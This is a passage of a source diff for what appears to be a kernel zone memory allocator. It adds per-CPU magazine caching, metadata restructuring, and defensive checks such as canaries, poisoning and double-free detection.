+ *      â•­â”€ a â”€ f â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€ zm_depot â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â•®
+ *      â”‚ â•­â”€â•® â•­â”€â•® â”‚ â•­â”€â•® â•­â”€â•® â•­â”€â•® â•­â”€â•® â•­â”€â•®         â”‚
+ *      â”‚ â”‚#│ â”‚#│ â”‚ â”‚#│ â”‚#│ â”‚#│ â”‚#│ â”‚#│         â”‚
+ *      â”‚ â”‚#│ â”‚ â”‚ â”‚ â”‚#│ â”‚#│ â”‚#│ â”‚#│ â”‚#│         â”‚
+ *      â”‚ â”‚ â”‚ â”‚ â”‚ â”‚ â”‚#│ â”‚#│ â”‚#│ â”‚#│ â”‚#│         â”‚
+ *      â”‚ â•°â”€â•¯ â•°â”€â•¯ â”‚ â•°â”€â•¯ â•°â”€â•¯ â•°â”€â•¯ â•°â”€â•¯ â•°â”€â•¯         â”‚
+ *      â•°â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â•¯
+ *
+ * It has two pre-loaded magazines (a)lloc and (f)ree which we allocate from,
+ * or free to. Serialization is achieved through disabling preemption, and only
+ * the current CPU can acces those allocations. This is represented on the left
+ * hand side of the diagram above.
+ *
+ * The right hand side is the per-cpu depot. It consists of @c zm_depot_count
+ * full magazines, and is protected by the @c zm_depot_lock for access.
+ * The lock is expected to absolutely never be contended, as only the local CPU
+ * tends to access the local per-cpu depot in regular operation mode.
+ *
+ * However unlike UMA, our implementation allows for the zone GC to reclaim
+ * per-CPU magazines aggresively, which is serialized with the @c zm_depot_lock.
+ *
+ *
+ * <h2>Recirculation Depot</h2>
+ *
+ * The recirculation depot layer is a list similar to the per-cpu depot,
+ * however it is different in two fundamental ways:
+ *
+ * - it is protected by the regular zone lock,
+ * - elements referenced by the magazines in that layer appear free
+ *   to the zone layer.
+ *
+ *
+ * <h2>Magazine circulation and sizing</h2>
+ *
+ * The caching system sizes itself dynamically. Operations that allocate/free
+ * a single element call @c zone_lock_nopreempt_check_contention() which records
+ * contention on the lock by doing a trylock and recording its success.
+ *
+ * This information is stored in the @c z_contention_cur field of the zone,
+ * and a windoed moving average is maintained in @c z_contention_wma.
+ * Each time a CPU registers any contention, it will also allow its own per-cpu
+ * cache to grow, incrementing @c zc_depot_max, which is how the per-cpu layer
+ * might grow into using its local depot.
+ *
+ * Note that @c zc_depot_max assume that the (a) and (f) pre-loaded magazines
+ * on average contain @c zc_mag_size() elements.
+ *
+ * When a per-cpu layer cannot hold more full magazines in its depot,
+ * then it will overflow about 1/3 of its depot into the recirculation depot
+ * (see @c zfree_cached_slow().  Conversely, when a depot is empty, then it will
+ * refill its per-cpu depot to about 1/3 of its size from the recirculation
+ * depot (see @c zalloc_cached_slow()).
+ *
+ * Lastly, the zone layer keeps track of the high and low watermark of how many
+ * elements have been free per period of time (including being part of the
+ * recirculation depot) in the @c z_elems_free_min and @c z_elems_free_max
+ * fields. A weighted moving average of the amplitude of this is maintained in
+ * the @c z_elems_free_wss which informs the zone GC on how to gently trim
+ * zones without hurting performance.
+ *
+ *
+ * <h2>Security considerations</h2>
+ *
+ * The zone caching layer has been designed to avoid returning elements in
+ * a strict LIFO behavior: @c zalloc() will allocate from the (a) magazine,
+ * and @c zfree() free to the (f) magazine, and only swap them when the
+ * requested operation cannot be fulfilled.
+ *
+ * The per-cpu overflow depot or the recirculation depots are similarly used
+ * in FIFO order.
+ *
+ * More importantly, when magazines flow through the recirculation depot,
+ * the elements they contain are marked as "free" in the zone layer bitmaps.
+ * Because allocations out of per-cpu caches verify the bitmaps at allocation
+ * time, this acts as a poor man's double-free quarantine. The magazines
+ * allow to avoid the cost of the bit-scanning involved in the zone-level
+ * @c zalloc_item() codepath.
+ *
+ *
+ * @field zc_alloc_cur      denormalized number of elements in the (a) magazine
+ * @field zc_free_cur       denormalized number of elements in the (f) magazine
+ * @field zc_alloc_elems    a pointer to the array of elements in (a)
+ * @field zc_free_elems     a pointer to the array of elements in (f)
+ *
+ * @field zc_depot_lock     a lock to access @c zc_depot, @c zc_depot_cur.
+ * @field zc_depot          a list of @c zc_depot_cur full magazines
+ * @field zc_depot_cur      number of magazines in @c zc_depot
+ * @field zc_depot_max      the maximum number of elements in @c zc_depot,
+ *                          protected by the zone lock.
+ */
+typedef struct zone_cache {
+       uint16_t                   zc_alloc_cur;
+       uint16_t                   zc_free_cur;
+       uint16_t                   zc_depot_cur;
+       uint16_t                   __zc_padding;
+       zone_element_t            *zc_alloc_elems;
+       zone_element_t            *zc_free_elems;
+       hw_lock_bit_t              zc_depot_lock;
+       uint32_t                   zc_depot_max;
+       struct zone_depot          zc_depot;
+} *zone_cache_t;
 
 static __security_const_late struct {
-       struct zone_map_range      zi_map_range;
-       struct zone_map_range      zi_general_range;
-       struct zone_map_range      zi_meta_range;
-       struct zone_map_range      zi_foreign_range;
+       struct zone_map_range      zi_map_range[ZONE_ADDR_KIND_COUNT];
+       struct zone_map_range      zi_meta_range; /* debugging only */
+       struct zone_map_range      zi_bits_range; /* bits buddy allocator */
 
        /*
         * The metadata lives within the zi_meta_range address range.
         *
         * The correct formula to find a metadata index is:
-        *     absolute_page_index - page_index(zi_meta_range.min_address)
+        *     absolute_page_index - page_index(MIN(zi_map_range[*].min_address))
         *
         * And then this index is used to dereference zi_meta_range.min_address
         * as a `struct zone_page_metadata` array.
         *
         * To avoid doing that substraction all the time in the various fast-paths,
-        * zi_array_base is offset by `page_index(zi_meta_range.min_address)`
-        * to avoid redoing that math all the time.
+        * zi_meta_base are pre-offset with that minimum page index to avoid redoing
+        * that math all the time.
+        *
+        * Do note that the array might have a hole punched in the middle,
+        * see zone_metadata_init().
         */
-       struct zone_page_metadata *zi_array_base;
+       struct zone_page_metadata *zi_meta_base;
 } zone_info;
 
+/*
+ * Initial array of metadata for stolen memory.
+ *
+ * The numbers here have to be kept in sync with vm_map_steal_memory()
+ * so that we have reserved enough metadata.
+ *
+ * After zone_init() has run (which happens while the kernel is still single
+ * threaded), the metadata is moved to its final dynamic location, and
+ * this array is unmapped with the rest of __startup_data at lockdown.
+ */
+#if CONFIG_GZALLOC
+#define ZONE_FOREIGN_META_INLINE_COUNT    20032
+#else
+#define ZONE_FOREIGN_META_INLINE_COUNT    64
+#endif
+__startup_data
+static struct zone_page_metadata
+    zone_foreign_meta_array_startup[ZONE_FOREIGN_META_INLINE_COUNT];
+
 /*
  *     The zone_locks_grp allows for collecting lock statistics.
  *     All locks are associated to this group in zinit.
  *     Look at tools/lockstat for debugging lock contention.
  */
-LCK_GRP_DECLARE(zone_locks_grp, "zone_locks");
-LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp);
+static LCK_GRP_DECLARE(zone_locks_grp, "zone_locks");
+static LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp);
 
 /*
  *     Exclude more than one concurrent garbage collection
  */
-LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc");
-LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp);
+static LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc");
+static LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp);
 
-boolean_t panic_include_zprint = FALSE;
+bool panic_include_zprint = FALSE;
 mach_memory_info_t *panic_kext_memory_info = NULL;
 vm_size_t panic_kext_memory_size = 0;
 
@@ -253,8 +431,8 @@ vm_size_t panic_kext_memory_size = 0;
  *      zone_destroyed_bitmap
  */
 static SIMPLE_LOCK_DECLARE(all_zones_lock, 0);
-static unsigned int     num_zones_in_use;
-unsigned int _Atomic    num_zones;
+static zone_id_t        num_zones_in_use;
+zone_id_t _Atomic       num_zones;
 SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count;
 
 #if KASAN_ZALLOC
@@ -262,7 +440,28 @@ SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count;
 #else /* !KASAN_ZALLOC */
 #define MAX_ZONES       402
 #endif/* !KASAN_ZALLOC */
-struct zone             zone_array[MAX_ZONES];
+
+/*
+ * Initial globals for zone stats until we can allocate the real ones.
+ * Those get migrated inside the per-CPU ones during zone_init() and
+ * this array is unmapped with the rest of __startup_data at lockdown.
+ */
+
+/* zone to allocate zone_magazine structs from */
+static SECURITY_READ_ONLY_LATE(zone_t) zc_magazine_zone;
+/*
+ * Until pid1 is made, zone caching is off,
+ * until compute_zone_working_set_size() runs for the firt time.
+ *
+ * -1 represents the "never enabled yet" value.
+ */
+static int8_t zone_caching_disabled = -1;
+
+__startup_data
+static struct zone_cache zone_cache_startup[MAX_ZONES];
+__startup_data
+static struct zone_stats zone_stats_startup[MAX_ZONES];
+struct zone              zone_array[MAX_ZONES];
 
 /* Initialized in zone_bootstrap(), how many "copies" the per-cpu system does */
 static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count;
@@ -270,9 +469,6 @@ static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count;
 /* Used to keep track of destroyed slots in the zone_array */
 static bitmap_t zone_destroyed_bitmap[BITMAP_LEN(MAX_ZONES)];
 
-/* number of pages used by all zones */
-static long _Atomic zones_phys_page_count;
-
 /* number of zone mapped pages used by all zones */
 static long _Atomic zones_phys_page_mapped_count;
 
@@ -298,70 +494,56 @@ TUNABLE(zone_security_options_t, zsecurity_options, "zs", ZSECURITY_DEFAULT);
 
 #if VM_MAX_TAG_ZONES
 /* enable tags for zones that ask for it */
-TUNABLE(bool, zone_tagging_on, "-zt", false);
+static TUNABLE(bool, zone_tagging_on, "-zt", false);
 #endif /* VM_MAX_TAG_ZONES */
 
 #if DEBUG || DEVELOPMENT
 TUNABLE(bool, zalloc_disable_copyio_check, "-no-copyio-zalloc-check", false);
-__options_decl(zalloc_debug_t, uint32_t, {
-       ZALLOC_DEBUG_ZONEGC     = 0x00000001,
-       ZALLOC_DEBUG_ZCRAM      = 0x00000002,
-});
-
-TUNABLE(zalloc_debug_t, zalloc_debug, "zalloc_debug", 0);
 #endif /* DEBUG || DEVELOPMENT */
 #if CONFIG_ZLEAKS
 /* Making pointer scanning leaks detection possible for all zones */
-TUNABLE(bool, zone_leaks_scan_enable, "-zl", false);
+static TUNABLE(bool, zone_leaks_scan_enable, "-zl", false);
 #else
 #define zone_leaks_scan_enable false
 #endif
 
-/*
- * Async allocation of zones
- * This mechanism allows for bootstrapping an empty zone which is setup with
- * non-blocking flags. The first call to zalloc_noblock() will kick off a thread_call
- * to zalloc_async. We perform a zalloc() (which may block) and then an immediate free.
- * This will prime the zone for the next use.
- *
- * Currently the thread_callout function (zalloc_async) will loop through all zones
- * looking for any zone with async_pending set and do the work for it.
+/*! @enum zprot_mode_t
  *
- * NOTE: If the calling thread for zalloc_noblock is lower priority than thread_call,
- * then zalloc_noblock to an empty zone may succeed.
- */
-static void zalloc_async(thread_call_param_t p0, thread_call_param_t p1);
-static thread_call_data_t call_async_alloc;
-static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size);
-
-/*
- * Zone Corruption Debugging
+ * @brief
+ * Zone element corruption detection mode.
  *
+ * @discussion
  * We use four techniques to detect modification of a zone element
  * after it's been freed.
  *
- * (1) Check the freelist next pointer for sanity.
- * (2) Store a backup of the next pointer at the end of the element,
- *     and compare it to the primary next pointer when the element is allocated
- *     to detect corruption of the freelist due to use-after-free bugs.
- *     The backup pointer is also XORed with a per-boot random cookie.
- * (3) Poison the freed element by overwriting it with 0xdeadbeef,
- *     and check for that value when the element is being reused to make sure
- *     no part of the element has been modified while it was on the freelist.
- *     This will also help catch read-after-frees, as code will now dereference
- *     0xdeadbeef instead of a valid but freed pointer.
- * (4) If the zfree_clear_mem flag is set clear the element on free and
- *     assert that it is still clear when alloc-ed.
- *
- * (1) and (2) occur for every allocation and free to a zone.
- * This is done to make it slightly more difficult for an attacker to
- * manipulate the freelist to behave in a specific way.
- *
- * Poisoning (3) occurs periodically for every N frees (counted per-zone).
+ * Elements that are in zones can be in 3 possible states:
+ * - zeroed out (@c ZPM_ZERO)
+ * - poisoned (@c ZPM_POISON) with the @c ZONE_POISON pattern
+ * - with a left and right canary (@c ZPM_CANARY).
+ *
+ * @c ZPM_AUTO is used when the actual protection for the element is unknown,
+ * and will be detected looking at the last word of the allocation at validation
+ * time.
+ *
+ * The mode of an element in zones is discovered by looking at its last
+ * pointer-sized value:
+ * - 0 means that it is zeroed out
+ * - @c ZONE_POISON means it is poisoned
+ * - any other value means it is using canaries.
+ *
+ * Elements are zeroed if:
+ * - the element size is smaller than @c zp_min_size,
+ * - the owning zone has the @c z_free_zeroes flag set,
+ * - the chunk backing store is fresh (and was just allocated).
+ *
+ * Elements are poisoned periodically for every N frees (counted per-zone),
+ * if the elements aren't otherwise zeroed out.
  * If -zp is passed as a boot arg, poisoning occurs for every free.
  *
- * Zeroing (4) is done for those zones that pass the ZC_ZFREE_CLEARMEM
- * flag on creation or if the element size is less than one cacheline.
+ * Else elements use canaries. When canaries are used, the first and last
+ * pointer sized values in the allocation are set to values derived from the
+ * element address and the @c zp_canary nonce. The first @c zp_min_size
+ * bytes of the elment are also cleared.
  *
  * Performance slowdown is inversely proportional to the frequency of poisoning,
  * with a 4-5% hit around N=1, down to ~0.3% at N=16 and just "noise" at N=32
@@ -372,23 +554,15 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size);
  *
  * For a more heavyweight, but finer-grained method of detecting misuse
  * of zone memory, look up the "Guard mode" zone allocator in gzalloc.c.
- *
- * Zone Corruption Logging
- *
- * You can also track where corruptions come from by using the boot-arguments
- * "zlog=<zone name to log> -zc". Search for "Zone corruption logging" later
- * in this document for more implementation and usage information.
- *
- * Zone Leak Detection
- *
- * To debug leaks of zone memory, use the zone leak detection tool 'zleaks'
- * found later in this file via the showtopztrace and showz* macros in kgmacros,
- * or use zlog without the -zc argument.
- *
  */
+__enum_closed_decl(zprot_mode_t, vm_offset_t, {
+       ZPM_AUTO,       /* element is indeterminate          */
+       ZPM_ZERO,       /* element is zeroed                 */
+       ZPM_POISON,     /* element is poisoned               */
+       ZPM_CANARY,     /* element extremities have a canary */
+});
+#define ZPM_MASK ((zprot_mode_t)0x3)
 
-#define ZP_DEFAULT_SAMPLING_FACTOR 16
-#define ZP_DEFAULT_SCALE_FACTOR 4
 
 /*
  * set by zp-factor=N boot arg
@@ -399,57 +573,63 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size);
  * A zp_factor of 1 indicates zone poisoning is on for all elements and can be
  * set by passing the -zp boot-arg.
  */
-static TUNABLE(uint32_t, zp_factor, "zp-factor", ZP_DEFAULT_SAMPLING_FACTOR);
+static TUNABLE(uint32_t, zp_factor, "zp-factor", 16);
 
 /* set by zp-scale=N boot arg, scales zp_factor by zone size */
-static TUNABLE(uint32_t, zp_scale, "zp-scale", ZP_DEFAULT_SCALE_FACTOR);
-
-/* initialized to a per-boot random value in zp_bootstrap */
-static SECURITY_READ_ONLY_LATE(uintptr_t) zp_poisoned_cookie;
-static SECURITY_READ_ONLY_LATE(uintptr_t) zp_nopoison_cookie;
-static SECURITY_READ_ONLY_LATE(uintptr_t) zp_min_size;
-static SECURITY_READ_ONLY_LATE(uint64_t) zone_phys_mapped_max;
-
-static SECURITY_READ_ONLY_LATE(vm_map_t) zone_submaps[Z_SUBMAP_IDX_COUNT];
-static SECURITY_READ_ONLY_LATE(uint32_t) zone_last_submap_idx;
+static TUNABLE(uint32_t, zp_scale, "zp-scale", 4);
 
-static struct bool_gen zone_bool_gen;
-static zone_t          zone_find_largest(void);
-static void            zone_drop_free_elements(zone_t z);
-
-#define submap_for_zone(z) zone_submaps[(z)->submap_idx]
-#define MAX_SUBMAP_NAME                16
-
-/* Globals for random boolean generator for elements in free list */
-#define MAX_ENTROPY_PER_ZCRAM           4
-
-#if CONFIG_ZCACHE
 /*
- * Specifies a single zone to enable CPU caching for.
- * Can be set using boot-args: zcc_enable_for_zone_name=<zone>
+ * Zone caching tunables
+ *
+ * zc_mag_size():
+ *   size of magazines, larger to reduce contention at the expense of memory
+ *
+ * zc_auto_enable_threshold
+ *   number of contentions per second after which zone caching engages
+ *   automatically.
+ *
+ *   0 to disable.
+ *
+ * zc_grow_threshold
+ *   numer of contentions per second after which the per-cpu depot layer
+ *   grows at each newly observed contention without restriction.
+ *
+ *   0 to disable.
+ *
+ * zc_recirc_denom
+ *   denominator of the fraction of per-cpu depot to migrate to/from
+ *   the recirculation depot layer at a time. Default 3 (1/3).
+ *
+ * zc_defrag_ratio
+ *   percentage of the working set to recirc size below which
+ *   the zone is defragmented. Default is 50%.
+ *
+ * zc_free_batch_size
+ *   The size of batches of frees/reclaim that can be done keeping
+ *   the zone lock held (and preemption disabled).
+ */
+static TUNABLE(uint16_t, zc_magazine_size, "zc_mag_size()", 8);
+static TUNABLE(uint32_t, zc_auto_threshold, "zc_auto_enable_threshold", 20);
+static TUNABLE(uint32_t, zc_grow_threshold, "zc_grow_threshold", 8);
+static TUNABLE(uint32_t, zc_recirc_denom, "zc_recirc_denom", 3);
+static TUNABLE(uint32_t, zc_defrag_ratio, "zc_defrag_ratio", 50);
+static TUNABLE(uint32_t, zc_free_batch_size, "zc_free_batch_size", 1024);
+
+static SECURITY_READ_ONLY_LATE(uintptr_t) zp_canary;
+/*
+ * Perf results for zeroing all non data zones and 2K of data zones
+ * showed little regression, therefore setting zp_min_size to 2048
  */
-static char cache_zone_name[MAX_ZONE_NAME];
-static TUNABLE(bool, zcc_kalloc, "zcc_kalloc", false);
+static TUNABLE(uint32_t, zp_min_size, "zclear_size", 2048);
+static SECURITY_READ_ONLY_LATE(uint32_t)  zone_phys_mapped_max_pages;
+static SECURITY_READ_ONLY_LATE(vm_map_t)  zone_submaps[Z_SUBMAP_IDX_COUNT];
+static SECURITY_READ_ONLY_LATE(uint32_t)  zone_last_submap_idx;
 
-__header_always_inline bool
-zone_caching_enabled(zone_t z)
-{
-       return z->zcache.zcc_depot != NULL;
-}
-#else
-__header_always_inline bool
-zone_caching_enabled(zone_t z __unused)
-{
-       return false;
-}
-#endif /* CONFIG_ZCACHE */
+static zone_t zone_find_largest(void);
 
+#endif /* !ZALLOC_TEST */
 #pragma mark Zone metadata
-
-__enum_closed_decl(zone_addr_kind_t, bool, {
-       ZONE_ADDR_NATIVE,
-       ZONE_ADDR_FOREIGN,
-});
+#if !ZALLOC_TEST
 
 static inline zone_id_t
 zone_index(zone_t z)
@@ -463,18 +643,36 @@ zone_has_index(zone_t z, zone_id_t zid)
        return zone_array + zid == z;
 }
 
-static inline vm_size_t
-zone_elem_count(zone_t zone, vm_size_t alloc_size, zone_addr_kind_t kind)
+static zone_element_t
+zone_element_encode(vm_offset_t base, vm_offset_t eidx, zprot_mode_t zpm)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               if (zone->percpu) {
-                       return PAGE_SIZE / zone_elem_size(zone);
-               }
-               return alloc_size / zone_elem_size(zone);
-       } else {
-               assert(alloc_size == PAGE_SIZE);
-               return (PAGE_SIZE - ZONE_PAGE_FIRST_OFFSET(kind)) / zone_elem_size(zone);
-       }
+       return (zone_element_t){ .ze_value = base | (eidx << 2) | zpm };
+}
+
+static vm_offset_t
+zone_element_base(zone_element_t ze)
+{
+       return trunc_page(ze.ze_value);
+}
+
+static vm_offset_t
+zone_element_idx(zone_element_t ze)
+{
+       return (ze.ze_value & PAGE_MASK) >> 2;
+}
+
+#if ZALLOC_ENABLE_POISONING
+static zprot_mode_t
+zone_element_prot(zone_element_t ze)
+{
+       return (zprot_mode_t)(ze.ze_value & ZPM_MASK);
+}
+#endif
+
+static vm_offset_t
+zone_element_addr(zone_element_t ze, vm_offset_t esize)
+{
+       return zone_element_base(ze) + esize * zone_element_idx(ze);
 }
 
 __abortlike
@@ -494,6 +692,15 @@ zone_invalid_element_addr_panic(zone_t zone, vm_offset_t addr)
            (void *)addr, zone_heap_name(zone), zone->z_name);
 }
 
+__abortlike
+static void
+zone_invalid_element_panic(zone_t zone, zone_element_t ze)
+{
+       panic("zone element pointer validation failed (elem: %p,%d, zone %s%s)",
+           (void *)zone_element_base(ze), (int)zone_element_idx(ze),
+           zone_heap_name(zone), zone->z_name);
+}
+
 __abortlike
 static void
 zone_page_metadata_index_confusion_panic(zone_t zone, vm_offset_t addr,
@@ -521,22 +728,6 @@ zone_page_metadata_list_corruption(zone_t zone, struct zone_page_metadata *meta)
            meta, zone_heap_name(zone), zone->z_name);
 }
 
-__abortlike
-static void
-zone_page_metadata_foreign_queue_corruption(zone_t zone, zone_pva_t *queue)
-{
-       panic("native metadata index %d enqueued in foreign head %p from zone %s%s",
-           queue->packed_address, queue, zone_heap_name(zone), zone->z_name);
-}
-
-__abortlike
-static void
-zone_page_metadata_foreign_confusion_panic(zone_t zone, vm_offset_t addr)
-{
-       panic("manipulating foreign address %p in a native-only zone %s%s",
-           (void *)addr, zone_heap_name(zone), zone->z_name);
-}
-
 __abortlike __unused
 static void
 zone_invalid_foreign_addr_panic(zone_t zone, vm_offset_t addr)
@@ -554,6 +745,15 @@ zone_page_meta_accounting_panic(zone_t zone, struct zone_page_metadata *meta,
            zone_heap_name(zone), zone->z_name, meta);
 }
 
+__abortlike
+static void
+zone_meta_double_free_panic(zone_t zone, zone_element_t ze, const char *caller)
+{
+       panic("%s: double free of %p to zone %s%s", caller,
+           (void *)zone_element_addr(ze, zone_elem_size(zone)),
+           zone_heap_name(zone), zone->z_name);
+}
+
 __abortlike
 static void
 zone_accounting_panic(zone_t zone, const char *kind)
@@ -562,6 +762,52 @@ zone_accounting_panic(zone_t zone, const char *kind)
            zone_heap_name(zone), zone->z_name);
 }
 
+#define zone_counter_sub(z, stat, value)  ({ \
+       if (os_sub_overflow((z)->stat, value, &(z)->stat)) { \
+           zone_accounting_panic(z, #stat " wrap-around"); \
+       } \
+       (z)->stat; \
+})
+
+static inline void
+zone_elems_free_add(zone_t z, uint32_t count)
+{
+       uint32_t n = (z->z_elems_free += count);
+       if (z->z_elems_free_max < n) {
+               z->z_elems_free_max = n;
+       }
+}
+
+static inline void
+zone_elems_free_sub(zone_t z, uint32_t count)
+{
+       uint32_t n = zone_counter_sub(z, z_elems_free, count);
+
+       if (z->z_elems_free_min > n) {
+               z->z_elems_free_min = n;
+       }
+}
+
+static inline uint16_t
+zone_meta_alloc_size_add(zone_t z, struct zone_page_metadata *m,
+    vm_offset_t esize)
+{
+       if (os_add_overflow(m->zm_alloc_size, (uint16_t)esize, &m->zm_alloc_size)) {
+               zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around");
+       }
+       return m->zm_alloc_size;
+}
+
+static inline uint16_t
+zone_meta_alloc_size_sub(zone_t z, struct zone_page_metadata *m,
+    vm_offset_t esize)
+{
+       if (os_sub_overflow(m->zm_alloc_size, esize, &m->zm_alloc_size)) {
+               zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around");
+       }
+       return m->zm_alloc_size;
+}
+
 __abortlike
 static void
 zone_nofail_panic(zone_t zone)
@@ -603,21 +849,15 @@ zone_range_size(const struct zone_map_range *r)
        return rmax - rmin;
 }
 
-#define from_zone_map(addr, size) \
-       zone_range_contains(&zone_info.zi_map_range, (vm_offset_t)(addr), size)
-
-#define from_general_submap(addr, size) \
-       zone_range_contains(&zone_info.zi_general_range, (vm_offset_t)(addr), size)
+#define from_zone_map(addr, size, kind) \
+       zone_range_contains(&zone_info.zi_map_range[kind], \
+           (vm_offset_t)(addr), size)
 
-#define from_foreign_range(addr, size) \
-       zone_range_contains(&zone_info.zi_foreign_range, (vm_offset_t)(addr), size)
+#define zone_native_size() \
+       zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_NATIVE])
 
-#define from_native_meta_map(addr) \
-       zone_range_contains(&zone_info.zi_meta_range, (vm_offset_t)(addr), \
-           sizeof(struct zone_page_metadata))
-
-#define zone_addr_kind(addr, size) \
-       (from_zone_map(addr, size) ? ZONE_ADDR_NATIVE : ZONE_ADDR_FOREIGN)
+#define zone_foreign_size() \
+       zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_FOREIGN])
 
 __header_always_inline bool
 zone_pva_is_null(zone_pva_t page)
@@ -663,6 +903,12 @@ zone_pva_from_addr(vm_address_t addr)
        return (zone_pva_t){ (uint32_t)((intptr_t)addr >> PAGE_SHIFT) };
 }
 
+__header_always_inline zone_pva_t
+zone_pva_from_element(zone_element_t ze)
+{
+       return zone_pva_from_addr(ze.ze_value);
+}
+
 __header_always_inline vm_address_t
 zone_pva_to_addr(zone_pva_t page)
 {
@@ -671,52 +917,44 @@ zone_pva_to_addr(zone_pva_t page)
 }
 
 __header_always_inline struct zone_page_metadata *
-zone_pva_to_meta(zone_pva_t page, zone_addr_kind_t kind)
+zone_pva_to_meta(zone_pva_t page)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               return &zone_info.zi_array_base[page.packed_address];
-       } else {
-               return (struct zone_page_metadata *)zone_pva_to_addr(page);
-       }
+       return &zone_info.zi_meta_base[page.packed_address];
 }
 
 __header_always_inline zone_pva_t
-zone_pva_from_meta(struct zone_page_metadata *meta, zone_addr_kind_t kind)
+zone_pva_from_meta(struct zone_page_metadata *meta)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               uint32_t index = (uint32_t)(meta - zone_info.zi_array_base);
-               return (zone_pva_t){ index };
-       } else {
-               return zone_pva_from_addr((vm_address_t)meta);
-       }
+       return (zone_pva_t){ (uint32_t)(meta - zone_info.zi_meta_base) };
 }
 
 __header_always_inline struct zone_page_metadata *
-zone_meta_from_addr(vm_offset_t addr, zone_addr_kind_t kind)
+zone_meta_from_addr(vm_offset_t addr)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               return zone_pva_to_meta(zone_pva_from_addr(addr), kind);
-       } else {
-               return (struct zone_page_metadata *)trunc_page(addr);
-       }
+       return zone_pva_to_meta(zone_pva_from_addr(addr));
+}
+
+__header_always_inline struct zone_page_metadata *
+zone_meta_from_element(zone_element_t ze)
+{
+       return zone_pva_to_meta(zone_pva_from_element(ze));
 }
 
-#define zone_native_meta_from_addr(addr) \
-       zone_meta_from_addr((vm_offset_t)(addr), ZONE_ADDR_NATIVE)
+__header_always_inline zone_id_t
+zone_index_from_ptr(const void *ptr)
+{
+       return zone_pva_to_meta(zone_pva_from_addr((vm_offset_t)ptr))->zm_index;
+}
 
 __header_always_inline vm_offset_t
-zone_meta_to_addr(struct zone_page_metadata *meta, zone_addr_kind_t kind)
+zone_meta_to_addr(struct zone_page_metadata *meta)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               return ptoa((int)(meta - zone_info.zi_array_base));
-       } else {
-               return (vm_offset_t)meta;
-       }
+       return ptoa((int32_t)(meta - zone_info.zi_meta_base));
 }
 
 __header_always_inline void
 zone_meta_queue_push(zone_t z, zone_pva_t *headp,
-    struct zone_page_metadata *meta, zone_addr_kind_t kind)
+    struct zone_page_metadata *meta)
 {
        zone_pva_t head = *headp;
        zone_pva_t queue_pva = zone_queue_encode(headp);
@@ -724,34 +962,30 @@ zone_meta_queue_push(zone_t z, zone_pva_t *headp,
 
        meta->zm_page_next = head;
        if (!zone_pva_is_null(head)) {
-               tmp = zone_pva_to_meta(head, kind);
+               tmp = zone_pva_to_meta(head);
                if (!zone_pva_is_equal(tmp->zm_page_prev, queue_pva)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
-               tmp->zm_page_prev = zone_pva_from_meta(meta, kind);
+               tmp->zm_page_prev = zone_pva_from_meta(meta);
        }
        meta->zm_page_prev = queue_pva;
-       *headp = zone_pva_from_meta(meta, kind);
+       *headp = zone_pva_from_meta(meta);
 }
 
 __header_always_inline struct zone_page_metadata *
-zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind,
-    vm_offset_t *page_addrp)
+zone_meta_queue_pop_native(zone_t z, zone_pva_t *headp, vm_offset_t *page_addrp)
 {
        zone_pva_t head = *headp;
-       struct zone_page_metadata *meta = zone_pva_to_meta(head, kind);
+       struct zone_page_metadata *meta = zone_pva_to_meta(head);
        vm_offset_t page_addr = zone_pva_to_addr(head);
        struct zone_page_metadata *tmp;
 
-       if (kind == ZONE_ADDR_NATIVE && !from_native_meta_map(meta)) {
+       if (!from_zone_map(page_addr, 1, ZONE_ADDR_NATIVE)) {
                zone_page_metadata_native_queue_corruption(z, headp);
        }
-       if (kind == ZONE_ADDR_FOREIGN && from_zone_map(meta, sizeof(*meta))) {
-               zone_page_metadata_foreign_queue_corruption(z, headp);
-       }
 
        if (!zone_pva_is_null(meta->zm_page_next)) {
-               tmp = zone_pva_to_meta(meta->zm_page_next, kind);
+               tmp = zone_pva_to_meta(meta->zm_page_next);
                if (!zone_pva_is_equal(tmp->zm_page_prev, head)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
@@ -759,19 +993,24 @@ zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind,
        }
        *headp = meta->zm_page_next;
 
+       meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 };
        *page_addrp = page_addr;
+
+       if (!zone_has_index(z, meta->zm_index)) {
+               zone_page_metadata_index_confusion_panic(z,
+                   zone_meta_to_addr(meta), meta);
+       }
        return meta;
 }
 
 __header_always_inline void
-zone_meta_requeue(zone_t z, zone_pva_t *headp,
-    struct zone_page_metadata *meta, zone_addr_kind_t kind)
+zone_meta_remqueue(zone_t z, struct zone_page_metadata *meta)
 {
-       zone_pva_t meta_pva = zone_pva_from_meta(meta, kind);
